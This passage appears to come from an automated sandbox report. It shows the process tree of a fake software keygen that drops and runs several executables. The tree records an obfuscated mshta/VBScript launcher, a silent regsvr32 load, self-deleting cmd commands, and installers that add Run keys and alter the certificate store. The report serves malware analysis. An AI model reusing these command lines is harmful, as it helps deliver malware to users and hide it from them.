                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5820
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2340 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:5868
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8768 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:5936
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2468 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:5984
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1984 /prefetch:2
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:6028
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2348 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:6064
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:6104
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1504 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:3472
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8204 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:804
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8284 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:7116
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2468 /prefetch:8
                                                                                                                                      2⤵
                                                                                                                                        PID:6896
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3920 /prefetch:8
                                                                                                                                        2⤵
                                                                                                                                          PID:3204
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3904 /prefetch:8
                                                                                                                                          2⤵
                                                                                                                                            PID:6556
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3780 /prefetch:8
                                                                                                                                            2⤵
                                                                                                                                              PID:6112
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8136 /prefetch:8
                                                                                                                                              2⤵
                                                                                                                                                PID:5284
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8304 /prefetch:8
                                                                                                                                                2⤵
                                                                                                                                                  PID:3968
                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.259.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=7enRsS4lQFO/GHH7dfjpcZbQY3iZbYio6K5OeL7L --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4520
                                                                                                                                                  • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                    "c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=89.259.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7ed97ac28,0x7ff7ed97ac38,0x7ff7ed97ac48
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:6324
                                                                                                                                                  • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                    "c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4520_SNFDBJDOBOKFVSEG" --sandboxed-process-id=2 --init-done-notifier=716 --sandbox-mojo-pipe-token=2633827554703759781 --mojo-platform-channel-handle=668 --engine=2
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:6836
                                                                                                                                                  • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                    "c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4520_SNFDBJDOBOKFVSEG" --sandboxed-process-id=3 --init-done-notifier=916 --sandbox-mojo-pipe-token=12901536034377191197 --mojo-platform-channel-handle=912
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5328
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7452 /prefetch:8
                                                                                                                                                  2⤵
                                                                                                                                                    PID:6748
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4876 /prefetch:8
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5812
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ChromeCleaner_0_4800_429507993\aa9c348c-8d51-46e4-80f8-eeb1636634c7.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\ChromeCleaner_0_4800_429507993\aa9c348c-8d51-46e4-80f8-eeb1636634c7.exe" --chrome-version=89.0.4389.114 --chrome-channel=4 --chrome-exe-path="C:\Program Files\Google\Chrome\Application\chrome.exe" --chrome-system-install --execution-mode=1 --engine=2 --chrome-prompt=3 --srt-field-trial-group-name=NewCleanerUIExperiment --chrome-write-handle=5272 --chrome-read-handle=7884
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:6564
                                                                                                                                                      • \??\c:\users\admin\appdata\local\temp\chromecleaner_0_4800_429507993\aa9c348c-8d51-46e4-80f8-eeb1636634c7.exe
                                                                                                                                                        c:\users\admin\appdata\local\temp\chromecleaner_0_4800_429507993\aa9c348c-8d51-46e4-80f8-eeb1636634c7.exe --crash-handler "--database=c:\users\admin\appdata\local\Google\Chrome Cleanup Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=89.259.200 --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x7ff61fc7b518,0x7ff61fc7b528,0x7ff61fc7b538
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:884
                                                                                                                                                      • \??\c:\users\admin\appdata\local\temp\chromecleaner_0_4800_429507993\aa9c348c-8d51-46e4-80f8-eeb1636634c7.exe
                                                                                                                                                        "c:\users\admin\appdata\local\temp\chromecleaner_0_4800_429507993\aa9c348c-8d51-46e4-80f8-eeb1636634c7.exe" --execution-mode=1 --use-crash-handler-with-id="\\.\pipe\crashpad_6564_YPVMANHTUDAZNVGV" --sandboxed-process-id=3 --init-done-notifier=840 --sandbox-mojo-pipe-token=215782670056637091 --mojo-platform-channel-handle=812
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3704
                                                                                                                                                      • \??\c:\users\admin\appdata\local\temp\chromecleaner_0_4800_429507993\aa9c348c-8d51-46e4-80f8-eeb1636634c7.exe
                                                                                                                                                        "c:\users\admin\appdata\local\temp\chromecleaner_0_4800_429507993\aa9c348c-8d51-46e4-80f8-eeb1636634c7.exe" --execution-mode=1 --use-crash-handler-with-id="\\.\pipe\crashpad_6564_YPVMANHTUDAZNVGV" --sandboxed-process-id=2 --init-done-notifier=968 --sandbox-mojo-pipe-token=4677089296838142795 --mojo-platform-channel-handle=868 --engine=2
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:384
                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2812
                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2704
                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2512
                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1404
                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:1348
                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1064
                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:68
                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                1⤵
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:4860
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  PID:748
                                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5512
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_serial_keys_gen_by_FFF.zip\Trepcad_6_6_00_serial_keys_gen_by_FFF.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_serial_keys_gen_by_FFF.zip\Trepcad_6_6_00_serial_keys_gen_by_FFF.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5652
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1332
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                          keygen-pr.exe -p83fsase3Ge
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:508
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:4660
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:2396
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                            keygen-step-1.exe
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:2564
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                                            keygen-step-5.exe
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:2500
                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1660
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "" == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:5152
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe
                                                                                                                                                                                      MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:3912
                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF ""/pkpxuxwmNl2s_EnQNC5XPVi2 "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:5616
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "/pkpxuxwmNl2s_EnQNC5XPVi2 " == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:4592
                                                                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                            "C:\Windows\System32\regsvr32.exe" /U -S .\5VOMHR.c
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:5808
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill /F -iM "keygen-step-5.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:2228
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                                      keygen-step-2.exe
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                      PID:364
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\C32D.tmp.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\C32D.tmp.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5828
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\C32D.tmp.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:1528
                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                PID:2560
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2368
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:852
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 200
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:4184
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5892
                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                  PID:5976
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                                              keygen-step-3.exe
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:1616
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:5436
                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                    PID:4868
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                                                keygen-step-4.exe
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                PID:2776
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                  PID:4572
                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:5144
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:5240
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:5800
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-7OEEL.tmp\Install.tmp
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-7OEEL.tmp\Install.tmp" /SL5="$2036C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:5772
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-FKRGM.tmp\Ultra.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-FKRGM.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                      PID:2868
                                                                                                                                                                                                      • C:\Program Files\Common Files\NWPLPINCXE\ultramediaburner.exe
                                                                                                                                                                                                        "C:\Program Files\Common Files\NWPLPINCXE\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:2760
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MQ8BR.tmp\ultramediaburner.tmp
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MQ8BR.tmp\ultramediaburner.tmp" /SL5="$B0232,281924,62464,C:\Program Files\Common Files\NWPLPINCXE\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                          PID:2204
                                                                                                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:3228
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7e-5a4af-919-3b29f-8f6051ad7c281\Kolafuzhesha.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7e-5a4af-919-3b29f-8f6051ad7c281\Kolafuzhesha.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                        PID:3732
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\57-a061d-2be-6b999-4c6942155b995\Rolycodoha.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\57-a061d-2be-6b999-4c6942155b995\Rolycodoha.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        PID:2792
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oibju4sg.f3d\instEU.exe & exit
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:4732
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\oibju4sg.f3d\instEU.exe
